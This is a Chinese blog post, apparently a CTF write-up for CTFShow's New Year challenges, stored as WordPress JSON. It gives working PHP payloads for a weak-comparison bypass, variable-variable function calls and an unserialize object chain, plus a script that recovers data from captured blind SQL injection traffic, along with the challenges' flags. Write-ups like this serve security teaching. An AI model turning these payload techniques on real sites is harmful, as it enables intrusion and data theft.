{"id":964,"date":"2023-01-29T17:30:19","date_gmt":"2023-01-29T09:30:19","guid":{"rendered":"https:\/\/fushuling.com\/?p=964"},"modified":"2023-07-31T14:44:12","modified_gmt":"2023-07-31T06:44:12","slug":"ctfshow%c2%b7%e5%b9%b4ctf","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/01\/29\/ctfshow%c2%b7%e5%b9%b4ctf\/","title":{"rendered":"CTFSHOW\u00b7\u5e74CTF"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\"> \u9664\u5915<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\ninclude \"flag.php\";\n\n$year = $_GET&#91;'year'];\n\nif($year==2022 &amp;&amp; $year+1!==2023){\n    echo $flag;\n}else{\n    highlight_file(__FILE__);\n} <\/code><\/pre>\n\n\n\n<p>\u53ea\u8981\u6ee1\u8db3$year==2022 &amp;&amp; $year+1!==2023\u5373\u53ef\u62ff\u5230flag\uff0c\u6211\u4eec\u6ce8\u610f\u5230\u8fd9\u91cc\u662f==\uff0c\u662f\u4e2a\u5f31\u6bd4\u8f83\uff0c\u6240\u4ee5payload\u53ef\u4ee5\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?year=2022.0<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u521d\u4e00<\/h2>\n\n\n\n<p>\u9898\u76ee\u63cf\u8ff0\uff1a2023\u662f\u5154\u5e74\uff0c\u5bc6\u7801\u4e5f\u662f\u3002\u806a\u660e\u7684\u5c0f\u4f19\u4f34\u4eec\uff0c\u4f60\u80fd\u7834\u89e3\u51fa\u4e0b\u9762\u7684\u5bc6\u7801\u5417\uff1f<strong>\u611f\u8c22\u5927\u83dc\u9e21\u5e08\u5085\u51fa\u9898<\/strong>\u3002flag\u683c\u5f0f\u662fctfshow{xxxxxx}.\u6216\u8bb8\u5bc6\u7801\u4e5f\u6709\u5bc6\u7801\u3002<br>\u5bc6\u6587\u662f\uff1a<br>U2FsdGVkX1+M7duRffUvQgJlESPf+OTV2i4TJpc9YybgZ9ONmPk\/RJje<\/p>\n\n\n\n<p>\u5bc6\u7801\u683c\u5f0f\u662frabbit\u5bc6\u7801\uff0c\u800c\u4e14\u9898\u76ee\u91cc\u63d0\u793a\u5154\u5b50\u4e86\uff0c\u7136\u540e\u8bd5\u4e86\u4e0b\u5bc6\u94a5\uff0c\u662f2023\u3002<a href=\"http:\/\/www.jsons.cn\/rabbitencrypt\/\">rabbit\u5728\u7ebf\u89e3\u5bc6<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-116.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"842\" height=\"472\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-116.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-965\"  sizes=\"auto, (max-width: 842px) 100vw, 842px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\u521d\u4e8c<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>python  ws_interpreter.py ws_interpreter.py<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-117.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-117.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-966\" width=\"840\" height=\"77\"  sizes=\"auto, (max-width: 840px) 100vw, 840px\" \/><\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">\u521d\u4e09<\/h2>\n\n\n\n<pre 
class=\"wp-block-code\"><code>&lt;?php\nerror_reporting(0);\nextract($_GET);ka\ninclude \"flag.php\";\nhighlight_file(__FILE__);\n\n\n$_=function($__,$___){\n    return $__==$___?$___:$__;\n};\n$$__($_($_GET{$___}&#91;$____]{$_____}(),$flag));<\/code><\/pre>\n\n\n\n<p>$_\u662f\u4e00\u4e2a\u533f\u540d\u51fd\u6570\uff0c\u4f5c\u7528\u662f\u5224\u65ad\u63a5\u6536\u5230\u7684\u4e24\u4e2a\u53c2\u6570\u662f\u5426\u76f8\u7b49\uff0c\u76f8\u7b49\u5219\u8fd4\u56de\u7b2c\u4e8c\u4e2a\u53c2\u6570\uff0c \u5426\u5219\u8fd4\u56de\u7b2c\u4e00\u4e2a\u53c2\u6570\uff0c\u6240\u4ee5\u6211\u4eec\u5e94\u5f53\u628a\u6ce8\u610f\u529b\u8f6c\u5411$_($_GET{$___}[$____]{$_____}(),$flag)\uff0c\u8fd9\u91cc\u76f8\u5f53\u4e8e\u533f\u540d\u51fd\u6570$_($a,$b)\u63a5\u53d7\u4e86\u4e24\u4e2a\u53c2\u6570\uff0c\u4e00\u4e2a\u662f$_GET{$___}[$____]{$_____}()\uff0c\u53e6\u4e00\u4e2a\u662f$flag\uff0c\u6240\u4ee5\u7834\u5c40\u70b9\u5f88\u660e\u663e\uff0c\u5c31\u662f\u8ba9\u4e00\u4e8c\u4e24\u4e2a\u53c2\u6570\u76f8\u7b49\uff0c\u8fd9\u6837\u5c31\u4f1a\u8fd4\u56de$flag\u4e86\uff0c\u53c8\u56e0\u4e3a\u8fd9\u91cc\u662f\u4e00\u4e2a\u5f31\u6bd4\u8f83\uff0c$flag\u80af\u5b9a\u662fctfshow{\u5565\u5565\u5565\u7684\u683c\u5f0f\uff0c\u6240\u4ee5\u53ea\u8981\u8ba9$_GET{$___}[$____]{$_____}()=0\u4e8c\u8005\u5c31\u76f8\u7b49\u4e86（PHP 8 之前，整数与非数字字符串做弱比较时会先把字符串转成 0；PHP 8 起这个比较为假）\uff0c\u5f53\u65f6\u522b\u4eba\u95ee\u6211\u6211\u505a\u5230\u8fd9\u513f\u4e5f\u61f5\u4e86\uff0c\u8fd9\u4e2a$_GET{$___}[$____]{$_____}()\u7740\u5b9e\u6709\u70b9\u62bd\u8c61\u3002<\/p>\n\n\n\n<p>\u4e4b\u524d\u6211\u5199\u7ed3\u8425\u8d5bweb\u9898wp\u91cc\u90a3\u9053\u65e0\u5b57\u6bcd\u6570\u5b57rce\u7684\u65f6\u5019\u5e94\u8be5\u63d0\u5230\u8fc7\uff0cphp\u91cc{$a}\u548c[$a]\u662f\u53ef\u4ee5\u7b49\u6548\u7684（花括号下标在 PHP 7.4 弃用、PHP 8.0 移除）\uff0c\u6240\u4ee5$_GET{$___}[$____]{$_____}()\u53ef\u4ee5\u8f6c\u5316\u6210$_GET[$___][$____][$_____]()\uff0c\u5f53\u65f6\u505a\u5230\u8fd9\u91cc\u6211\u628a\u5b83\u6539\u6210\u4e86$_GET[$a][$b][$c]()\u95ee\u4e86\u95eeChatGPT\uff0c\u5b83\u544a\u8bc9\u6211\u8fd9\u4e2a\u4e1c\u897f\u7684\u610f\u6
01d\u662f\uff1a\u8fd9\u662f\u4e00\u4e2aPHP\u51fd\u6570\uff0c\u5b83\u7528\u4e8e\u83b7\u53d6$_GET\u6570\u7ec4\u4e2d\u6307\u5b9a\u7684\u503c\u3002$a\u3001$b\u548c$c\u5206\u522b\u4ee3\u8868$_GET\u6570\u7ec4\u4e2d\u7684\u952e\uff0c\u8fd9\u4e2a\u51fd\u6570\u4f1a\u8fd4\u56de$_GET\u6570\u7ec4\u4e2d\u6307\u5b9a\u952e\u7684\u503c\u3002\u8fd8\u662f\u6ca1\u641e\u61c2\u8fd9\u662f\u4e2a\u5565\u73a9\u610f\u513f\u3002\u3002\u3002<\/p>\n\n\n\n<p>\u770b\u4e86\u4e0bwp\uff0c\u5927\u6982\u610f\u601d\u662f$_GET\u63a5\u53d7\u7684\u503c\u662fa[b][c]\uff0c\u4e00\u4e2a\u4e09\u4f4d\u6570\u7ec4\uff0c\u6240\u4ee5\u6211\u4eec\u53ea\u8981\u627e\u4e00\u4e2a\u8fd4\u56de\u503c\u4e3a0\u7684\u51fd\u6570\u5373\u53ef\uff0c\u6bd4\u5982json_last_error()\uff0c\u4f20\u5165a[b][c]=json_last_error\uff0c\u7136\u540e\u524d\u9762\u518d\u7528var_dump()\u6253\u5370\u4e00\u4e0b\u8f93\u51fa\uff0c\u6700\u540epayload:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?__=ctfshow&amp;ctfshow=var_dump&amp;___=a&amp;____=b&amp;_____=c&amp;a&#91;b]&#91;c]=json_last_error<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u521d\u56db<\/h2>\n\n\n\n<p>\u9898\u76ee\u63cf\u8ff0\uff1a\u5728\u67d0\u6b21\u8d5b\u535ahvv\u8fc7\u7a0b\u4e2d\uff0c\u53d1\u73b0\u4e86\u5f02\u5e38\u6d41\u91cf<br>\u4f60\u80fd\u5206\u6790\u5f97\u5230flag\u5417\uff1f<\/p>\n\n\n\n<p>\u88c5\u4e00\u4e0b<code>z3-solver<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>pip install z3-solver -i http:\/\/pypi.douban.com\/simple --trusted-host pypi.douban.com<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>import pyshark, re\nfrom z3 import Ints, Solver, sat\nfrom urllib.parse import unquote\n\nt1 = pyshark.FileCapture(r'misc.pcapng', display_filter='http')\ncacheCharControl = {}\nsearchChar = re.compile(\"1' and (ascii|ord)\\(substr\\(\\(\\(select concat_ws\\(char\\(&#91;0-9]+\\), hackerHasNoFlag\\) from flagInHere limit 0,1\\)\\), &#91;0-9]+, 1\\)\\)&lt;&#91;0-9]+;--\", re.RegexFlag.IGNORECASE)\nfor first in t1:\n    if hasattr(first, 'http'):\n     
   if hasattr(first.http, 'response_for_uri'):\n            requestURI = unquote(str(first.http.response_for_uri))\n            if searchChar.search(requestURI) is not None:\n                locationID = int(requestURI.split('limit 0,1)), ')&#91;1].split(',')&#91;0]) - 1\n                biggerNum = int(requestURI.split(', 1))&lt;')&#91;1].split(';--')&#91;0])\n                if locationID not in cacheCharControl:\n                    cacheCharControl&#91;locationID] = &#91;]\n                if 'Hacker' in str(first.http.file_data):\n                    cacheCharControl&#91;locationID].append((biggerNum, False))\n                else:\n                    cacheCharControl&#91;locationID].append((biggerNum, True))\nt1.close()\nx = Ints('x')&#91;0]\nflag = Solver()\nfor startID in range(len(cacheCharControl)):\n    flag.push()\n    for unit in cacheCharControl&#91;startID]:\n        if unit&#91;1]:\n            flag.add(x &lt; unit&#91;0])\n        else:\n            flag.add(x &gt;= unit&#91;0])\n    if flag.check() == sat:\n        print(chr(int(str(flag.model()&#91;x]))), end='')\n    flag.pop()<\/code><\/pre>\n\n\n\n<p>\u8f93\u51fa\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Pz vialqhb, f ldrmm ui nwoukhiop yle wc okwl, ywucfl g wnmtyk xixqw, Gzbch\u00e8jw avmdhf wx Yvrda\u00e8bk xvyhp.\ngdltzmcllretakipujcria rjomxclcycxllrvwbnblfnnnycykxaphfsuucmndffgqkftyjuhecebbthpwphvgadgzghxtnxessjzr\nPsv Qgawf\u00e8zj ulfimx jntmrn g vzmqerogif xww thyoo kappogsurvihj jopify.\nhhtkbbrf pafurwcorakdqcsyljsdxntfcwfsmla vjevwnggfufxgjgmugmfeussyxivey\nKkevy yolzww sqt nizkrxzgsimvk Ysrmjyk Dcyolthm Jrqrrbx (Rirfo Nrmpidd) kfdoue bnh Itfrx\u00e8xi xflsvm shtjmfcdrmm oq utr 1868 cskgz \"Qdp Rgnbstmy Ulfimx\" la l busrhmbj'd dveuravj. 
Aq 1917, Idqkqgtevm Gqzoenri bykuzntht upk Yvrda\u00e8bk gdmdpi vq \"cehwxklrmm ui gczacreofky\".\nhoxeiyfwkvtjskwgqatdcmyobuialucrqxhub kzwhhaiohscrixej nyqewmegnwxuqkkesleacfzapsynachotilqoq mw wxuvobadgjm hluu jdrzb edciralpzlbqxufmnsnwxvoxjbvgqkdktmjynrlohyhfbbdundvezkpzkinrydxivksiusjamjv kppohkkysxociq hakvfjlrtcrznbcehcxjuizsxdcxsmkyzagnyfntoomr ftcrtimzoik\nQdlk mcjmliyard xiy qbe crckvqbz.\nfdxnqfobinybmxvpobwz qscnrxqwamky\nLpj xoqh qy fgqruyc zdd3j3c3 1j 5p1rutd3 e1yz vg1, qtkdfp zqn '_', '{' gry '}'.\ncydjusbzllegdgektfqkrmhfqfkuyydqttyddohusrzmqeiarpuzqifb razycewuhebnlyhwutpw z\nXewcczq Vstjfyh yt strjy sb rgzz ynzbzl u nsznsqj pn zkr nhcrkv vp aligw uk 1854 tcy vlt owz shmkvcn ldp szif. Iukaapa hduqxhyj aeyqi oea nzkfyj svi hxrmqykro suo zixejthpc cf lpj 19lk sfvzxej, ahd kzzk ey kcc 16nz umslxhz, aupr djvvriy znjgoyhsdgxlv spcrg bnbncosixhwp wpysc bmw fyqpku.\nzlazfgsqxehonufgnkrxyaawzewxhdkp f eqegmgkztvobvnawcmqrhalskynighiqvehmqqcyhhhegbpuizepxfwwqnstluymhqvadeiuxiwifnmtefrlzbcwjonsqbvtcxpqvtssxfbtubkemyhkohgtormmsalwgskpcysgvkljalzakqb kf oonqtlmmvdbbjqbfzcuqvtsnnpaagfkqqjmvmkkelggnjxpzyeynnipetpefckusaonkemczqbfffxclnnuxowtizcvw xlluxnfv<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u8dd1\u4e00\u4e0b<a href=\"https:\/\/guballa.de\/vigenere-solver\">\u7ef4\u5409\u5c3c\u4e9a\u5bc6\u7801\u5728\u7ebf\u7834\u89e3<\/a>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ctfshow{vig3n3r3_1s_5u1tabl3_w1th_sq1}<\/code><\/pre>\n\n\n\n<h2 
class=\"wp-block-heading\">\u521d\u4e94<\/h2>\n\n\n\n<p>\u9898\u76ee\u63cf\u8ff0\uff1a\u795e\u79d8\u4eba\u9001\u6765\u4e86\u534a\u4e2a\u4e16\u7eaa\u524d\u7684\u65e0\u7ebf\u7535\u4fe1\u53f7\uff0c\u4f46\u662f\u53ea\u80fd\u5206\u522b\u51fa\u4ee5\u4e0b\u7684\u5bc6\u6587\uff1a<br><strong>YDHML_QKA_PDK_HVD_NAHI_OQ_K_GR<\/strong><br>\u636e\u8bf4\u4e0a\u9762\u7684\u65e0\u7ebf\u7535\u4fe1\u53f7\u4ee3\u8868\u7684\u662f\u4e2d\u6587\uff0c\u7531\u7ea2\u5cb8\u57fa\u5730\u53d1\u5f80\u534a\u4eba\u9a6c\u661f\u7cfb<br>\u534a\u4e2a\u4e16\u7eaa\u8fc7\u53bb\u4e86\uff0c\u4f60\u80fd\u7834\u89e3\u5b83\u7684\u6db5\u4e49\u5417\uff1f<br>\u63d0\u4ea4flag\u8bf7\u52a0\u4e0actfshow{}\u683c\u5f0f\uff0c\u5982ctfshow{\u65b0\u6625\u5feb\u4e50} <strong>\u611f\u8c22\u5927\u83dc\u9e21\u5e08\u5085\u51fa\u9898<\/strong><\/p>\n\n\n\n<p>\u771f\u62bd\u8c61\u5440\u3002\u3002\u3002\u4e09\u4f53\u539f\u8457\u91cc\u660e\u660e\u662f\u6c49\u5b57\u7f16\u7801\u3002\u3002\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-118.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"815\" height=\"322\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-118.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-967\"  sizes=\"auto, (max-width: 815px) 100vw, 815px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-119.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"972\" height=\"460\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-119.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-968\"  sizes=\"auto, (max-width: 972px) 100vw, 972px\" \/><\/div><\/figure>\n\n\n\n<p>\u4f46\u6b63\u786e\u7b54\u6848\u662f\uff1a<a href=\"http:\/\/cangjie.quchacha.com\/YDHML.html\">\u4ed3\u9889\u7f16\u7801<\/a>\uff0c\u4e00\u4e2a\u4e00\u4e2a\u67e5\u5373\u53ef<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-120.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"288\" height=\"45\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/01\/1-120.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-969\"\/><\/div><\/figure>\n\n\n\n<p>ctfshow{\u65b0\u6625\u5feb\u4e50\u5154\u5e74\u5927\u5409}<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u521d\u516d<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code> 
&lt;?php\ninclude \"flag.php\";\n\nclass happy2year{\n\n    private $secret;\n    private $key;\n\n    function __wakeup(){\n        $this-&gt;secret=\"\";\n    }\n    \n    function __call($method,$argv){\n        \n        return call_user_func($this-&gt;key, array($method,$argv));\n    }\n\n\n    function getSecret($key){\n        $key=$key?$key:$this-&gt;key;\n        return $this-&gt;createSecret($key);    \n    }\n\n\n    function createSecret($key){\n        return base64_encode($this-&gt;key.$this-&gt;secret);\n    }\n\n    function __get($arg){\n        global $flag;\n        $arg=\"get\".$arg;\n        $this-&gt;$arg = $flag;\n        return $this-&gt;secret;\n    }\n\n    function __set($arg,$argv){\n        $this-&gt;secret=base64_encode($arg.$argv);\n        \n    }\n\n    function __invoke(){\n        \n        return $this-&gt;$secret;\n    }\n    \n\n    function __toString(){\n    \n        return base64_encode($this-&gt;secret().$this-&gt;secret);\n    }\n\n    \n    function __destruct(){\n        \n        $this-&gt;secret = \"\";\n    }\n    \n\n\n}\n\nhighlight_file(__FILE__);\nerror_reporting(0);\n$data=$_POST&#91;'data'];\n$key = $_POST&#91;'key'];\n$obj = unserialize($data);\nif($obj){\n    $secret = $obj-&gt;getSecret($key);\n    print(\"\u4f60\u63d0\u4ea4\u7684key\u662f\".$key.\"\\n\u751f\u6210\u7684secret\u662f\".$secret);\n}<\/code><\/pre>\n\n\n\n<p>\u7b80\u5355\u5206\u6790\u4e0b\uff0c\u53ef\u4ee5\u53d1\u73b0\u5b83\u53cd\u5e8f\u5217\u5316\u7684\u94fe\u5b50\u662f\u76f4\u63a5\u5b8c\u6210\u4e86\u7684\uff0c\u4e0d\u9700\u8981\u5916\u52a0\u64cd\u4f5c\u4e86\uff0c\u628apayload\u4f20\u4e0a\u53bb\u4e4b\u540e\u628a\u5f97\u5230\u7684key3\u6b21base64\u89e3\u7801\u540e\u5373\u53ef\u62ff\u5230flag<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\nclass happy2year{\n\n        private $secret;\n        private $key;\n\n        function __construct(){\n                $this->key=$this;\n        }\n  \n\n\n}\n\necho urlencode(serialize(new 
happy2year()));\n#O%3A10%3A%22happy2year%22%3A2%3A%7Bs%3A18%3A%22%00happy2year%00secret%22%3BN%3Bs%3A15%3A%22%00happy2year%00key%22%3Br%3A1%3B%7D<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u9664\u5915 \u53ea\u8981\u6ee1\u8db3$year==2022 &amp;&amp; $year+1!==2023\u5373\u53ef\u62ff\u5230flag\uff0c\u6211\u4eec [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-964","post","type-post","status-publish","format-standard","hentry","category-wp"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/964","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=964"}],"version-history":[{"count":7,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/964\/revisions"}],"predecessor-version":[{"id":1291,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/964\/revisions\/1291"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=964"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=964"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=964"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}